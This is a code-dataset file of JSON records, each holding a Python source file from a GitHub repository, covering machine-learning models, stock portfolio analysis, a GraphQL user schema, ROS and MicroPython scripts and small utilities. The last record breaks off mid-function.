+{"seq_id":"26420935558","text":"from typing import Dict\n\nimport pandas as pd\n\nfrom encord_active.lib.db.tags import Tags\n\n\ndef count_of_tags(df: pd.DataFrame) -> Dict[str, int]:\n tag_list = Tags().all()\n if not tag_list:\n return {}\n\n tag_counts = df[\"tags\"].value_counts()\n\n total_tags_count: Dict[str, int] = {tag.name: 0 for tag in tag_list}\n for unique_list, count in tag_counts.items():\n for tag in unique_list:\n total_tags_count[tag.name] += count\n\n return total_tags_count\n","repo_name":"feemthan/encord-active","sub_path":"src/encord_active/lib/db/helpers/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"}
+{"seq_id":"454992253","text":"from imports import *\n\ndef hough(edges):\n\th = np.zeros((100,361))\n\tfor edge in edges:\n\t\tfor o in range(360):\n\t\t\tp = round(abs(edge[0]*np.cos(o*np.pi/180) + edge[1]*np.sin(o*np.pi/180)))\n\t\t\n\t\t\th[p,o] += 1 \n\treturn h,o,p\n\ndef plot(edges,h):\n\th = h*255/h.max() \n\tplt.imshow(h,cmap = 'gray')\t\n\tplt.show()\t\n\n\nimg = cv2.imread('../pictures/ps1_1.png')\nedge_img = cv2.Canny(img,0,1)\n\nh,o,p = hough(edge_img)\nplot(edge_img,h)\n","repo_name":"ajayrfhp/computerVision","sub_path":"opencv_gists/hough_line.py","file_name":"hough_line.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"}
+{"seq_id":"30309015752","text":"import os\n\n# Folder paths to process\nfolder_paths = [\n # \"./data/utility_cache/--topic effective --dataset adult --model AdultMLP\",\n # \"./data/utility_cache/--topic effective --dataset bank --model BankMLP\",\n \"./data/utility_cache/--topic robust --dataset adult --model AdultMLP\",\n \"./data/utility_cache/--topic robust --dataset bank --model BankMLP\",\n \"./data/utility_cache/--topic robust --dataset dota2 --model Dota2MLP\",\n \"./data/utility_cache/--topic robust --dataset tictactoe --model TicTacToeMLP\",\n]\n# Iterate over every file in each folder\nfor folder_path in folder_paths:\n for filename in os.listdir(folder_path):\n # Get the file name and the file extension\n name, ext = os.path.splitext(filename)\n\n if 'data replication --' in name:\n new_name = name.replace('data replication --', 'data replication 1 --')\n elif 'random data generation --' in name:\n new_name = name.replace('random data generation --', 'random data generation 1 --')\n elif 'label flip --' in name:\n new_name = name.replace('label flip --', 'label flip 1 --')\n elif 'low quality data --' in name:\n new_name = name.replace('low quality data --', 'low quality data 1 --')\n # elif \"--distribution label skew\" in name:\n # new_name = name.replace('--distribution label skew', 'label skew')\n # else:\n # raise Exception\n else:\n continue\n\n # Build the new file name\n new_filename = new_name + ext\n\n # Build the old and new file paths\n old_path = os.path.join(folder_path, filename)\n new_path = os.path.join(folder_path, new_filename)\n #\n # old_path = folder_path + '/' + filename\n # new_path = folder_path + '/' + new_filename\n # Rename the file\n os.rename(old_path, new_path)\n","repo_name":"veevang/flce-exp-eval-code","sub_path":"myrename.py","file_name":"myrename.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"23221234286","text":"from models.GridEval import GridEval\nfrom sklearn.ensemble import RandomForestClassifier\n\nclass RandomForest(GridEval):\n \"\"\"run the Random Forest model\n \"\"\"\n\n def randomRunGrid(self,classWeight = None):\n \"\"\"Set the parameters to select from for Random Grid Search \n Output:\n the best model returned by random grid search\n \"\"\"\n print(\"\\n\"+\"RANDOM FOREST\"+\"\\n\")\n n_estimators = [x for x in range(5,20,4)]\n max_features = ['auto']\n max_depth = [x for x in range(60,95,15)]\n bootstrap = [True]\n rand_param = { 'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'bootstrap': bootstrap,\n 'n_jobs': [-1],\n 'class_weight': [classWeight]\n } \n \n randfor = RandomForestClassifier()\n return(self.randomGrid(randfor,rand_param,9))\n\n def randomBest(self):\n \"\"\"define the best performing random forest model for application_train.csv\n \"\"\"\n print(\"\\n\"+\"RANDOM FOREST\"+\"\\n\")\n self.model = RandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',\n max_depth=90, max_features='auto', max_leaf_nodes=None,\n min_impurity_decrease=0.0, min_impurity_split=None,\n min_samples_leaf=1, min_samples_split=2,\n min_weight_fraction_leaf=0.0, n_estimators=17, n_jobs=-1,\n oob_score=False, random_state=None, verbose=0,\n warm_start=False)\n self.evaluate()","repo_name":"regap4693/BINARY-CLASSIFICATION","sub_path":"models/RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"24976222634","text":"import numpy as np\nimport pandas as pd\nfrom Stocks import *\nfrom StockData import *\n\n\nclass LowRiskInvestment:\n def __init__(self, stocks):\n self.s = stocks\n self.stocks = stocks.stocks_list()\n self.df_daily_return = 
stocks.daily_return_for_all_stocks()\n self.df_adj_close = stocks.get_adj_close_for_all_stocks()\n\n def get_cov_roi_for_all_stocks(self):\n # it will return return on investments and coefficient variance\n col_names = [\"Ticker\", \"COV\", \"ROI\"]\n df = pd.DataFrame(columns=col_names)\n stocks_list = self.stocks\n for stock in stocks_list:\n df.loc[len(df.index)] = [stock.get_ticker(), stock.get_coefficient_in_period(), stock.get_roi_in_period()]\n return df\n\n def get_top_n_roi(self, n):\n df = self.get_cov_roi_for_all_stocks().sort_values(by=['ROI'], ascending=False).head(n)\n return df\n\n def get_correlation_FANNGS(self):\n self.df_daily_return.corr().plot(kind='bar')\n plt.show()\n\n def get_correlation_FANNGS_for_stock(self, ticker):\n self.df_daily_return.corr()[ticker].plot(kind='bar')\n plt.show()\n\n def get_Variance_for_stock(self, ticker):\n df = self.df_daily_return\n return df[ticker].var() * len(df)\n\n def get_covariance_of_stocks(self):\n df = self.df_daily_return\n return df.cov() * len(df)\n\n def plot_growth_of_investment(self):\n (self.df_adj_close / self.df_adj_close.iloc[0] * 100).plot(figsize=(16, 9))\n plt.show()\n\n def optimize_portfolio(self, number_combination):\n risk_free_rate = 0.0125 # years bound rate\n portfolio_returns = []\n portfolio_volatility = []\n portfolio_ratio = []\n portfolio_weights = []\n returns = np.log(self.df_adj_close / self.df_adj_close.shift(1))\n for x in range(number_combination):\n p_weights = np.random.random(len(self.stocks))\n p_weights /= np.sum(p_weights)\n\n ret = np.sum(p_weights * returns.mean()) * 252\n portfolio_returns.append(ret) # saving return\n\n vol = np.sqrt(np.dot(p_weights.T, np.dot(returns.cov() * 252, p_weights)))\n portfolio_volatility.append(vol) # saving volatility\n\n sr = (ret - risk_free_rate) / vol\n portfolio_ratio.append(sr) # saving sharpe ratio\n\n portfolio_weights.append(p_weights)\n\n portfolio_returns = np.array(portfolio_returns)\n portfolio_volatility = np.array(portfolio_volatility)\n portfolio_ratio = np.array(portfolio_ratio)\n portfolio_weights = np.array(portfolio_weights)\n\n SR_index = np.argmax(portfolio_ratio)\n\n for x in range(len(self.stocks)):\n print(\"Stocks: %s : %2.2f\" % (self.stocks[x].get_ticker(), (portfolio_weights[SR_index][x] * 100)))\n print(f\"Volatility = {portfolio_volatility[SR_index]}\")\n print(f\"Return = {portfolio_returns[SR_index]}\")\n\n def calculate_beta(self):\n \"\"\"\n Beta provides the relationship between an investment and the overall market. 
Risky investments tend to fall\n further during bad times, but will increase more quickly during good times.\n\n Beta is found by dividing the covariance of the stock and the market by the variance of the overall market.\n It is a measure of systematic risk that can't be diversified away.\n\n B = 0 no relation to market\n B < 1 less risky than market\n B > 1 More risky than market\n \"\"\"\n for x in self.stocks:\n Tickers = [\"^GSPC\"]\n Tickers.append(x.get_ticker())\n ss = Stocks(Tickers,self.s.starting_year, self.s.starting_month, self.s.starting_day, self.s.ending_year,\n self.s.ending_month, self.s.ending_day)\n daily_df = ss.daily_return_for_all_stocks()\n cov = daily_df.cov() * 252\n cov_vs_market = cov.iloc[0,1]\n sp_var = daily_df['^GSPC'].var() * 252\n beta = cov_vs_market / sp_var\n print(f\"Stock : {x.get_ticker()} has a Beta = {beta}\")\n\n tickers = self.s.tickers_list\n tickers.append(\"^GSPC\")\n ss = Stocks(tickers, self.s.starting_year, self.s.starting_month, self.s.starting_day, self.s.ending_year,\n self.s.ending_month, self.s.ending_day)\n daily_df = ss.daily_return_for_all_stocks()\n cov = daily_df.cov() * 252\n cov_vs_market = cov.iloc[0, 1]\n sp_var = daily_df['^GSPC'].var() * 252\n beta = cov_vs_market / sp_var\n print(f\"Beta for whole portfolio : {beta}\")\n return beta\n\n def get_portfolio_roi_tot(self):\n df = self.df_adj_close\n\n for i in range(len(self.stocks)):\n tic = self.stocks[i].get_ticker()\n amount = int(input(f\"How many {tic} shares do you want? \"))\n df[tic] = df[tic].apply(lambda x: x * amount)\n df[\"Total\"] = df.iloc[:,0:len(self.stocks)].sum(axis=1)\n start_value = df[\"Total\"].iloc[0]\n end_value = df[\"Total\"].iloc[-1]\n roi_tot = (end_value-start_value)/start_value\n return roi_tot\n\n def get_alpha(self):\n risk_free_rate = 0.0125\n roi_tot = self.get_portfolio_roi_tot()\n sto = StockData(\"^GSPC\",self.s.starting_year, self.s.starting_month, self.s.starting_day, self.s.ending_year,\n self.s.ending_month, self.s.ending_day)\n sp_roi = sto.get_roi_in_period()\n print(f\"Portfolio ROI: {roi_tot}\")\n print(f\"S&P ROI: {sp_roi}\")\n p_alpha = roi_tot - risk_free_rate -(self.calculate_beta()*(sp_roi - risk_free_rate))\n print(f\"Alpha = {p_alpha}\")\n\n\n\n\n# ---------------------------------------------------------------------------------------------------------------\n\n# TEST CODE:\n\n# ---------------------------------------------------------------------------------------------------------------\n\n\n# tickers = [\"FB\", \"AAPL\", \"NFLX\", \"GOOG\", \"AMZN\", \"RIOT\"]\n# stocks = Stocks(tickers, 2020, 1, 2, 2020, 12, 31)\n# lri = LowRiskInvestment(stocks)\n# lri.get_correlation_FANNGS()\n# print(lri.get_Variance_for_stock(\"NFLX\"))\n# print(lri.get_covariance_of_stocks())\n\n# tickers = get_sector_tickers(\"Industrials\")\n# port_list = [\"GNRC\", \"DXCM\", \"AMD\", \"NFLX\", \"COST\", \"TGT\", \"AES\", \"MSCI\",\n# \"NEM\", \"SBAC\", \"HES\"]\n#port_list = [\"GOOG\",\"FB\"]\nport_list = [\"IDEX\",\"DSS\",\"PLTR\",\"URA\",\"NPK\",\"INTC\"]\nstocks = Stocks(port_list, 2021, 1, 1, 2021, 12, 31)\nlri = LowRiskInvestment(stocks)\nlri.get_correlation_FANNGS()\nprint(lri.get_top_n_roi(5))\nlri.plot_growth_of_investment()\nlri.optimize_portfolio(10000)\nlri.get_alpha()\n\n#get Alpha for Tasi !!","repo_name":"a1234jehad/MyTraderApp","sub_path":"LowRiskInvestment.py","file_name":"LowRiskInvestment.py","file_ext":"py","file_size_in_byte":6665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"94817563","text":"import torch\nfrom torch import nn\n\nclass CRNNEncoder(nn.Module):\n def __init__(self):\n super(CRNNEncoder, self).__init__()\n self.cnn = nn.Conv1d(\n in_channels=40, out_channels=64, kernel_size=20, padding=20//2\n )\n self.gru = nn.GRU(input_size=64, hidden_size=128)\n\n def forward(self, x, encoder_hidden):\n\n outputs = self.cnn(x)\n\n outputs = torch.transpose(outputs, 0, 2)\n outputs = torch.transpose(outputs, 1, 2)\n\n if encoder_hidden == None:\n outputs, hidden = self.gru(outputs)\n else:\n outputs, hidden = self.gru(outputs, encoder_hidden)\n\n outputs = torch.transpose(outputs, 0, 1)\n\n return outputs, hidden\n \nclass Attn(nn.Module):\n def __init__(self):\n super(Attn, self).__init__()\n self.main_fully_connected = nn.Linear(in_features=128, out_features=64)\n self.main_softmax = nn.Softmax(dim=-1)\n self.tanh = nn.Tanh()\n self.v = nn.Linear(64, 1)\n self.middle_softmax = nn.Softmax(dim=1)\n self.final_fully_connected = nn.Linear(in_features=128, out_features=2)\n self.final_softmax = nn.Softmax(dim=0)\n\n def forward(self, hiddens, single_input):\n\n x = self.main_fully_connected(hiddens)\n x = self.main_softmax(x)\n x = self.tanh(x)\n\n e = self.v(x)\n a = self.middle_softmax(e)\n\n outputs = []\n for i in range(hiddens.shape[0]):\n outputs.append(torch.mm(torch.transpose(hiddens[i], 0, 1), a[i]))\n outputs = torch.transpose(torch.cat(outputs, dim=1), 0, 1)\n\n outputs = self.final_fully_connected(outputs)\n\n if not single_input:\n outputs = self.final_softmax(outputs)\n\n return outputs\n\n\nclass KWS(nn.Module):\n def __init__(self):\n super(KWS, self).__init__()\n self.encoder = CRNNEncoder()\n self.attention = Attn()\n\n def forward(self, x, encoder_hidden = None, single_input = False):\n\n outputs, hidden = self.encoder(x, encoder_hidden)\n x = self.attention(outputs, single_input)\n\n return x, hidden\n ","repo_name":"MaxTheHuman/MyKWS","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8979411341","text":"import graphene\nfrom app.db import (\n db,\n Community as CommunityDB,\n Challenge as ChallengeDB,\n EntryEvent as EntryEventDB,\n Proposal as ProposalDB,\n Entry as EntryDB,\n Vote as VoteDB,\n VoteCommit,\n)\nfrom app.graphql.utils import (\n get_order_history,\n get_transfer_history,\n from_address_to_community,\n)\nfrom app.graphql import (\n user_balance as user_balance_module,\n transfer as transfer_module,\n order as order_module,\n vote as vote_module,\n proposal as proposal_module,\n reward as reward_module,\n challenge as challenge_module,\n entry as entry_module,\n)\n\n\nclass User(graphene.ObjectType):\n \"\"\" self = String representing the user's address \"\"\"\n\n class Meta:\n description = \"Represents an individual's Ethereum wallet that can interact with Band Protocol.\"\n\n address = graphene.String(\n required=True, description=\"The Ethereum address of this user.\"\n )\n\n balances = graphene.List(\n lambda: graphene.NonNull(user_balance_module.UserBalance),\n required=True,\n description=\"The list of token balances that this wallet has.\",\n filtered_by=graphene.Argument(\n lambda: user_balance_module.UserBalanceFilters\n ),\n )\n\n order_history = graphene.List(\n lambda: graphene.NonNull(order_module.Order),\n required=True,\n description=\"The list of all buy and sell orders conducted by this user to bonding curves.\",\n 
filtered_by=graphene.Argument(lambda: order_module.OrderFilters),\n )\n transfer_history = graphene.List(\n lambda: graphene.NonNull(transfer_module.Transfer),\n required=True,\n description=\"The list of all transfers sent from or received by this user.\",\n filtered_by=graphene.Argument(lambda: transfer_module.TransferFilters),\n )\n\n proposals = graphene.List(\n lambda: graphene.NonNull(proposal_module.Proposal),\n required=True,\n description=\"The list of all proposals proposed by this user.\",\n )\n\n votes = graphene.List(\n lambda: graphene.NonNull(vote_module.Vote),\n required=True,\n description=\"The list of all votes performed by this user.\",\n filtered_by=graphene.Argument(lambda: vote_module.VoteFilters),\n )\n\n tcr_entries = graphene.List(\n lambda: graphene.NonNull(entry_module.Entry),\n required=True,\n description=\"The list of all TCR entries proposed by this user.\",\n )\n\n tcr_challenges = graphene.List(\n lambda: graphene.NonNull(challenge_module.Challenge),\n required=True,\n description=\"The list of all TCR challenges initiated by this user.\",\n )\n\n tcr_rewards = graphene.List(\n lambda: graphene.NonNull(reward_module.Reward),\n required=True,\n description=\"The list of all TCR rewards owned by this user.\",\n )\n\n def resolve_address(self, info):\n return self\n\n def resolve_balances(self, info, filtered_by={}):\n if \"tokens\" in filtered_by:\n return [\n (self, comm)\n for comm in from_address_to_community(filtered_by[\"tokens\"])\n ]\n return [(self, comm) for comm in db.session.query(CommunityDB).all()]\n\n def resolve_order_history(self, info, filtered_by={}):\n if \"communities\" in filtered_by:\n filtered_by[\"communities\"] = from_address_to_community(\n filtered_by[\"communities\"]\n )\n return get_order_history(**filtered_by, users=[self])\n\n def resolve_transfer_history(self, info, filtered_by={}):\n if \"tokens\" in filtered_by:\n filtered_by[\"tokens\"] = from_address_to_community(\n filtered_by[\"tokens\"]\n )\n return get_transfer_history(**filtered_by, users=[self])\n\n def resolve_votes(self, info, filtered_by={}):\n if \"category\" in filtered_by and filtered_by[\"category\"] == \"cr\":\n return [\n (\n commit_vote,\n db.session.query(VoteDB)\n .filter_by(\n poll_id=commit_vote.poll_id, voter=commit_vote.voter\n )\n .first(),\n )\n for commit_vote in db.session.query(VoteCommit)\n .filter_by(voter=self)\n .all()\n ]\n\n return db.session.query(VoteDB).filter_by(voter=self).all()\n\n def resolve_proposals(self, info):\n return db.session.query(ProposalDB).filter_by(proposer=self).all()\n\n def resolve_tcr_rewards(self, info):\n return db.session.query(VoteDB).filter_by(voter=self).all()\n\n def resolve_tcr_challenges(self, info):\n return [\n (\n challenge_init,\n db.session.query(ChallengeDB)\n .filter_by(contract_id=challenge_init.contract_id)\n .filter_by(on_chain_id=challenge_init.on_chain_id)\n .filter(ChallengeDB.challenger == None)\n .first(),\n )\n for challenge_init in db.session.query(ChallengeDB)\n .filter_by(challenger=self)\n .all()\n ]\n\n def resolve_tcr_entries(self, info):\n entry_event_ids = [\n entry_event.entry.id\n for entry_event in db.session.query(EntryEventDB)\n .filter_by(actor=self)\n .all()\n ]\n return [\n (\n entry,\n db.session.query(EntryEventDB)\n .filter_by(entry_id=entry.id, action=\"SUBMITTED\")\n .order_by(EntryEventDB.id.desc())\n .first(),\n )\n for entry in db.session.query(EntryDB)\n .filter(EntryDB.id.in_(entry_event_ids))\n .all()\n 
]\n","repo_name":"prin-r/tcrapi","sub_path":"app/graphql/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"20488447222","text":"# update test\n\nfrom machine import I2C, Pin\nimport ssd1306\nimport json\nfrom time import sleep\n\ni2c = I2C(-1, Pin(5), Pin(4))\n\ndisplay = ssd1306.SSD1306_I2C(128, 64, i2c)\ndisplay.fill(0)\n\nfor i in range(100):\n \n if i % 2 == 0:\n display.text('{}'.format(i),0,0) # text, position x, position y\n display.show()\n display.fill(0)\n \n else:\n display.text('res > 0',0,0) # text, position x, position y\n display.show()\n display.fill(0)\n \n sleep(0.1)","repo_name":"bergpb/micropython_codes","sub_path":"testeUpdate.py","file_name":"testeUpdate.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"43363706799","text":"#!/usr/bin/env python\nimport sys\nimport rospy\nfrom smart_movement.srv import *\nfrom std_msgs.msg import String\n\n\nclass handle_web_speed_status():\n def __init__(self):\n\n self.flag = False\n rospy.init_node('web_status_speed_server')\n \n # subscribe to the server topic \n rospy.Subscriber('/robot_status', String, self.callback)\n self.status_speed_pub = rospy.Publisher('/web_status_speed', String, queue_size=10)\n rospy.loginfo('Waiting for connection')\n rospy.loginfo(self.status_speed_pub.get_num_connections())\n # while (self.status_speed_pub.get_num_connections() == 0 ):\n # pass\n rospy.loginfo('waiting for the service')\n s = rospy.Service('web_status_speed_srv', RequestStatus, self.web_speed_status)\n \n rospy.spin()\n \n def web_speed_status(self, req):\n # publish the service coming from the web_server to the multithreaded-server\n rospy.loginfo(req.statusreq)\n self.status_speed_pub.publish(req.statusreq)\n rospy.loginfo('Waiting for the response')\n\n # while self.flag == False:\n # pass\n self.received = 'Motor:[1,1,1,1], Start:[1], Speed:[2], Emergency:[0,0,]'\n\n \n self.flag = True\n #send the info back to the web server \n return RequestStatusResponse(self.received)\n \n def callback(self, data):\n rospy.loginfo(\"updated\")\n self.flag = True \n self.received = data.data \n rospy.loginfo(self.received)\n\n# def web_status_speed_server():\n# rospy.init_node('web_status_speed_server')\n# # subscribe to the server topic \n# status_speed_pub = rospy.Publisher('/web_status_speed', String, queue_size=10)\n# while (status_speed_pub.get_num_connections() == 0):\n# rospy.loginfo(\"waiting for subscriber\")\n \n# s = rospy.Service('web_status_speed', RequestStatus, handle_web_speed_status)\n# rospy.spin()\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n try:\n handle_web_speed_status()\n \n except rospy.ROSInitException:\n rospy.loginfo(\"Terminated\")\n pass","repo_name":"fontyssmartwrist/backup","sub_path":"smart_movement/src/test_web_server.py","file_name":"test_web_server.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"21744408308","text":"import random\nprint('This contains the makeFace function') # added section\na = 5 # added section\n\ndef makeFace():\n face = ['(x_x)', '(O_O)', '(-_-#)', '(>_<)', '(^o^)', '=^Y^=', '(`_^)',\n 'd-_-b', 'p(^o^)q']\n numFace = len(face)\n index = random.randint(0, numFace - 1)\n return face[index]\n \nprint(makeFace()) 
\n","repo_name":"gilbutITbook/007013","sub_path":"chap3/sample_function_01_추가버전.py","file_name":"sample_function_01_추가버전.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"39896651955","text":"import base64\nfrom StringIO import StringIO\n\nfrom PIL import Image\n\nfrom pypln.backend.workers import WordCloud\nfrom utils import TaskTest\n\n\nclass TestFreqDistWorker(TaskTest):\n name = \"WordCloud\"\n def test_wordcloud_should_return_a_base64_encoded_png(self):\n doc = {'freqdist': [('is', 2), ('the', 2), ('blue', 1), ('sun', 1),\n ('sky', 1), (',', 1), ('yellow', 1), ('.', 1)], 'language': 'en'}\n doc_id = self.collection.insert(doc, w=1)\n WordCloud().delay(doc_id)\n\n refreshed_document = self.collection.find_one({'_id': doc_id})\n raw_png_data = base64.b64decode(refreshed_document['wordcloud'])\n\n fake_file = StringIO(raw_png_data)\n img = Image.open(fake_file)\n img.verify()\n self.assertEqual(img.format, 'PNG')\n","repo_name":"NAMD/pypln.backend","sub_path":"tests/test_worker_wordcloud.py","file_name":"test_worker_wordcloud.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"18"} +{"seq_id":"21333693731","text":"import torch\nimport random\nfrom torch import optim\nimport pytorch_lightning as pl\n\nfrom typing import Any, List, Optional, Tuple\nfrom pytorch_lightning.utilities.types import STEP_OUTPUT\n\nfrom src.models.components.decoder_attn_rnn import AttnDecoderRNN\nfrom src.models.components.encoder_rnn import EncoderRNN\n\n\nclass MessageEventEncoderLitModule(pl.LightningModule):\n def __init__(\n self,\n vector_size,\n hidden_size,\n max_length,\n START,\n END,\n optimizer: optim.Optimizer,\n tf_rate: float = 0.8,\n nucleus_p: float = 0.9,\n ):\n super().__init__()\n self.input_size = self.output_size = vector_size\n self.hidden_size = hidden_size\n self.max_length = max_length\n self.START = START\n self.END = END\n self.tf_rate = tf_rate\n self.nucleus_p = nucleus_p\n\n self.optimizer = optimizer\n self.encoder = EncoderRNN(self.input_size, self.hidden_size)\n self.decoder = AttnDecoderRNN(\n self.hidden_size, self.output_size, max_length=self.max_length\n )\n self.metric = torch.nn.NLLLoss()\n self.save_hyperparameters()\n\n def encode(self, input) -> torch.Tensor:\n input_tensor = input\n encoder_hidden = self.encoder.initHidden()\n input_length = input_tensor.size(0)\n encoder_outputs = torch.zeros(\n self.max_length, self.encoder.hidden_size, dtype=torch.float\n )\n for ei in range(input_length):\n encoder_output, encoder_hidden = self.encoder(\n input_tensor[ei], encoder_hidden\n )\n encoder_outputs[ei] = encoder_output[0, 0]\n\n return encoder_outputs\n\n def decode(\n self, input, target: Optional[torch.Tensor] = None\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n decoder_input = self.START\n decoder_hidden = self.decoder.initHidden()\n decoder_outputs = list()\n\n loss = torch.tensor(0, dtype=torch.float)\n count = 0\n for di in range(self.max_length):\n decoder_output, decoder_hidden, _ = self.decoder(\n decoder_input, decoder_hidden, input\n )\n _, top_i = decoder_output.topk(1)\n decoder_input = top_i.squeeze()\n\n if target is not None:\n target_i = (\n target[di] if di < target.size(0) else torch.tensor([self.END])\n )\n loss += self.metric(decoder_output, target_i)\n\n decoder_outputs.append(top_i.item())\n count += 1\n if top_i.item() == self.END:\n break\n\n if target is not 
None:\n loss = loss / count\n return torch.tensor(decoder_outputs), loss\n\n def forward(self, input) -> Tuple[List, torch.Tensor, torch.Tensor, List]:\n assert input.size(0) == 1, \"batch has to be of size 1\"\n input_tensor = input[0]\n\n encoder_hidden = self.encoder.initHidden()\n input_length = input_tensor.size(0)\n encoder_outputs = torch.zeros(\n self.max_length, self.encoder.hidden_size, dtype=torch.float\n )\n loss = torch.tensor(0, dtype=torch.float)\n for ei in range(input_length):\n encoder_output, encoder_hidden = self.encoder(\n input_tensor[ei], encoder_hidden\n )\n encoder_outputs[ei] = encoder_output[0, 0]\n\n decoder_input = self.START\n decoder_hidden = self.decoder.initHidden()\n decoder_outputs = list()\n probabilities = list()\n\n count = 0\n for di in range(self.max_length):\n decoder_output, decoder_hidden, _ = self.decoder(\n decoder_input, decoder_hidden, encoder_outputs\n )\n dist = torch.exp(decoder_output).view(-1)\n dist_sorted, dist_i = dist.sort(descending=True)\n\n nucleus = torch.cumsum(dist_sorted, dim=0) < self.nucleus_p\n nucleus = torch.cat(\n [nucleus.new_ones(nucleus.shape[:-1] + (1,)), nucleus[..., :-1]], dim=-1\n )\n candidates = dist_i[nucleus]\n probabilities.append((dist_sorted[nucleus], candidates))\n\n target = (\n input_tensor[di]\n if di < input_tensor.size(0)\n else torch.tensor([self.END])\n )\n decoder_input = target\n\n loss += self.metric(decoder_output, target)\n\n if target in candidates:\n step_output = target.item()\n else:\n step_output = candidates[0].item()\n\n decoder_outputs.append(step_output)\n count += 1\n if step_output == self.END:\n break\n\n assert count != 0, \"count can not be 0\"\n loss = loss / count\n return decoder_outputs, loss, encoder_outputs, probabilities\n\n def training_step(self, batch, batch_idx) -> STEP_OUTPUT:\n input_tensor = batch\n assert input_tensor.size(0) == 1, \"batch has to be of size 1\"\n input_tensor = input_tensor[0]\n target_tensor = input_tensor\n\n encoder_hidden = self.encoder.initHidden()\n input_length = input_tensor.size(0)\n encoder_outputs = torch.zeros(\n self.max_length, self.encoder.hidden_size, dtype=torch.float\n )\n loss = torch.tensor(0, dtype=torch.float)\n for ei in range(input_length):\n encoder_output, encoder_hidden = self.encoder(\n input_tensor[ei], encoder_hidden\n )\n encoder_outputs[ei] = encoder_output[0, 0]\n\n decoder_input = self.START\n decoder_hidden = self.decoder.initHidden()\n\n teacher_forcing = random.random() < self.tf_rate\n count = 0\n if teacher_forcing:\n for di in range(input_length):\n decoder_output, decoder_hidden, _ = self.decoder(\n decoder_input, decoder_hidden, encoder_outputs\n )\n loss += self.metric(decoder_output, target_tensor[di])\n decoder_input = target_tensor[di]\n count += 1\n else:\n for di in range(input_length):\n decoder_output, decoder_hidden, _ = self.decoder(\n decoder_input, decoder_hidden, encoder_outputs\n )\n _, top_i = decoder_output.topk(1)\n decoder_input = top_i.squeeze().detach()\n\n loss += self.metric(decoder_output, target_tensor[di])\n count += 1\n if decoder_input.item() == self.END:\n break\n\n assert count != 0, \"count can not be 0\"\n loss = loss / count\n self.log(\"train_loss\", loss)\n return loss\n\n def test_step(self, batch, batch_idx) -> None:\n input_tensor = batch\n _, loss, *_ = self.forward(input_tensor)\n self.log(\"test_loss\", loss)\n\n def validation_step(self, batch, batch_idx) -> Optional[STEP_OUTPUT]:\n _, loss, *_ = self.forward(batch)\n self.log(\"val_loss\", loss)\n\n def 
predict_step(self, batch: Any, batch_idx: int, dataloader_idx: int = 0) -> Any:\n input_tensor = batch\n decoder_outputs, loss, *_ = self.forward(input_tensor)\n return (decoder_outputs, input_tensor.squeeze().tolist(), loss)\n\n def configure_optimizers(self):\n return self.optimizer(self.parameters()) # type: ignore\n","repo_name":"nico-ru/BAnDIT","sub_path":"src/models/message_event_encoder.py","file_name":"message_event_encoder.py","file_ext":"py","file_size_in_byte":7451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24636814673","text":"import csv\nimport os\nfrom collections import defaultdict\nfrom collections import deque\n\nimport numpy\nimport numpy as np\nfrom mindspore import Tensor, ops, nn\nimport mindspore as ms\nfrom shapely import Polygon\n\n\nclass SmoothedValue():\n \"\"\"Track a series of values and provide access to smoothed values over a\n window or the global series average.\n \"\"\"\n\n def __init__(self, window_size=10):\n self.deque = deque(maxlen=window_size)\n self.series = []\n self.total = 0.0\n self.count = 0\n\n def update(self, value):\n self.deque.append(value)\n self.series.append(value)\n self.count += 1\n self.total += value\n\n @property\n def value(self):\n d = Tensor(list(self.deque))\n return d[-1].item()\n\n @property\n def median(self):\n d = Tensor(list(self.deque))\n return d.median().item()\n\n @property\n def avg(self):\n d = Tensor(list(self.deque))\n return d.mean().asnumpy()\n\n @property\n def global_avg(self):\n return self.total / self.count\n\n\nclass MetricLogger():\n def __init__(self, delimiter=\"\\t\"):\n self.meters = defaultdict(SmoothedValue)\n self.delimiter = delimiter\n\n def update(self, **kwargs):\n for k, v in kwargs.items():\n if isinstance(v, Tensor) or isinstance(v, numpy.ndarray):\n v = v.item()\n assert isinstance(v, (float, int))\n self.meters[k].update(v)\n\n def __getattr__(self, attr):\n if attr in self.meters:\n return self.meters[attr]\n if attr in self.__dict__:\n return self.__dict__[attr]\n raise AttributeError(\"{} object has no attribute {}\".format(\n type(self).__name__, attr))\n\n def __str__(self):\n loss_str = []\n for name, meter in self.meters.items():\n # loss_str.append(\n # \"{}: {:.4f} ({:.4f})\".format(name, meter.median, meter.global_avg)\n # )\n loss_str.append(\n \"{}: {:.4f}\".format(name, meter.avg)\n )\n return self.delimiter.join(loss_str)\n\n\ndef get_device_id():\n device_id = os.getenv('DEVICE_ID', '0')\n return 